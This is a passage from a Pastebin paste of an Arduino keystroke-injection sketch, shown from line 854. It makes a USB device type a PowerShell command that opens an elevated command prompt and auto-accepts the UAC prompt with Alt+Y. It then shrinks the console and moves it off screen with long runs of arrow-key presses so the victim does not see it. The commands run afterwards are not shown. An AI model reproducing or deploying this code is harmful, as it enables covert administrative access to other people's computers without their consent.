  854. print(F("powershell Start-Process cmd -Verb runAs"));
  855.  
  856. type(KEY_RETURN,false);
  857. Keyboard.releaseAll();
  858. delay(750);
  859.  
  860. type(KEY_LEFT_ALT,false);
  861. type('y',false);
  862. Keyboard.releaseAll();
  863. delay(750);
  864.  
  865. print(F("mode con:cols=14 lines=1"));
  866.  
  867. type(KEY_RETURN,false);
  868. Keyboard.releaseAll();
  869.  
  870. type(KEY_LEFT_ALT,false);
  871. Keyboard.releaseAll();
  872. delay(750);
  873.  
  874. print(F("m"));
  875. delay(750);
  876.  
  877. type(KEY_DOWN_ARROW,false);
  878. Keyboard.releaseAll();
  879.  
  880. type(KEY_DOWN_ARROW,false);
  881. Keyboard.releaseAll();
  882.  
  883. type(KEY_DOWN_ARROW,false);
  884. Keyboard.releaseAll();
  885.  
  886. type(KEY_DOWN_ARROW,false);
  887. Keyboard.releaseAll();
  888.  
  889. type(KEY_DOWN_ARROW,false);
  890. Keyboard.releaseAll();
  891.  
  892. type(KEY_DOWN_ARROW,false);
  893. Keyboard.releaseAll();
  894.  
  895. type(KEY_DOWN_ARROW,false);
  896. Keyboard.releaseAll();
  897.  
  898. type(KEY_DOWN_ARROW,false);
  899. Keyboard.releaseAll();
  900.  
  901. type(KEY_DOWN_ARROW,false);
  902. Keyboard.releaseAll();
  903.  
  904. type(KEY_DOWN_ARROW,false);
  905. Keyboard.releaseAll();
  906.  
  907. type(KEY_DOWN_ARROW,false);
  908. Keyboard.releaseAll();
  909.  
  910. type(KEY_DOWN_ARROW,false);
  911. Keyboard.releaseAll();
  912.  
  913. type(KEY_DOWN_ARROW,false);
  914. Keyboard.releaseAll();
  915.  
  916. type(KEY_DOWN_ARROW,false);
  917. Keyboard.releaseAll();
  918.  
  919. type(KEY_DOWN_ARROW,false);
  920. Keyboard.releaseAll();
  921.  
  922. type(KEY_DOWN_ARROW,false);
  923. Keyboard.releaseAll();
  924.  
  925. type(KEY_DOWN_ARROW,false);
  926. Keyboard.releaseAll();
  927.  
  928. type(KEY_DOWN_ARROW,false);
  929. Keyboard.releaseAll();
  930.  
  931. type(KEY_DOWN_ARROW,false);
  932. Keyboard.releaseAll();
  933.  
  934. type(KEY_DOWN_ARROW,false);
  935. Keyboard.releaseAll();
  936.  
  937. type(KEY_DOWN_ARROW,false);
  938. Keyboard.releaseAll();
  939.  
  940. type(KEY_DOWN_ARROW,false);
  941. Keyboard.releaseAll();
  942.  
  943. type(KEY_DOWN_ARROW,false);
  944. Keyboard.releaseAll();
  945.  
  946. type(KEY_DOWN_ARROW,false);
  947. Keyboard.releaseAll();
  948.  
  949. type(KEY_DOWN_ARROW,false);
  950. Keyboard.releaseAll();
  951.  
  952. type(KEY_DOWN_ARROW,false);
  953. Keyboard.releaseAll();
  954.  
  955. type(KEY_DOWN_ARROW,false);
  956. Keyboard.releaseAll();
  957.  
  958. type(KEY_DOWN_ARROW,false);
  959. Keyboard.releaseAll();
  960.  
  961. type(KEY_DOWN_ARROW,false);
  962. Keyboard.releaseAll();
  963.  
  964. type(KEY_DOWN_ARROW,false);
  965. Keyboard.releaseAll();
  966.  
  967. type(KEY_DOWN_ARROW,false);
  968. Keyboard.releaseAll();
  969.  
  970. type(KEY_DOWN_ARROW,false);
  971. Keyboard.releaseAll();
  972.  
  973. type(KEY_DOWN_ARROW,false);
  974. Keyboard.releaseAll();
  975.  
  976. type(KEY_DOWN_ARROW,false);
  977. Keyboard.releaseAll();
  978.  
  979. type(KEY_DOWN_ARROW,false);
  980. Keyboard.releaseAll();
  981.  
  982. type(KEY_DOWN_ARROW,false);
  983. Keyboard.releaseAll();
  984.  
  985. type(KEY_DOWN_ARROW,false);
  986. Keyboard.releaseAll();
  987.  
  988. type(KEY_DOWN_ARROW,false);
  989. Keyboard.releaseAll();
  990.  
  991. type(KEY_DOWN_ARROW,false);
  992. Keyboard.releaseAll();
  993.  
  994. type(KEY_DOWN_ARROW,false);
  995. Keyboard.releaseAll();
  996.  
  997. type(KEY_DOWN_ARROW,false);
  998. Keyboard.releaseAll();
  999.  
  1000. type(KEY_DOWN_ARROW,false);
  1001. Keyboard.releaseAll();
  1002.  
  1003. type(KEY_DOWN_ARROW,false);
  1004. Keyboard.releaseAll();
  1005.  
  1006. type(KEY_DOWN_ARROW,false);
  1007. Keyboard.releaseAll();
  1008.  
  1009. type(KEY_DOWN_ARROW,false);
  1010. Keyboard.releaseAll();
  1011.  
  1012. type(KEY_DOWN_ARROW,false);
  1013. Keyboard.releaseAll();
  1014.  
  1015. type(KEY_DOWN_ARROW,false);
  1016. Keyboard.releaseAll();
  1017.  
  1018. type(KEY_DOWN_ARROW,false);
  1019. Keyboard.releaseAll();
  1020. for(int i = 0; i < 70; i++) {
  1021.  
  1022. type(KEY_DOWN_ARROW,false);
  1023. Keyboard.releaseAll();
  1024. }
  1025. Keyboard.end();
  1026. }
  1027. void type(int key, boolean release) {
  1028. Keyboard.press(key);
  1029. if(release)
  1030. Keyboard.release(key);
  1031. }
  1032. void print(const __FlashStringHelper *value) {
  1033. Keyboard.print(value);
  1034. }
  1035. void loop(){}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!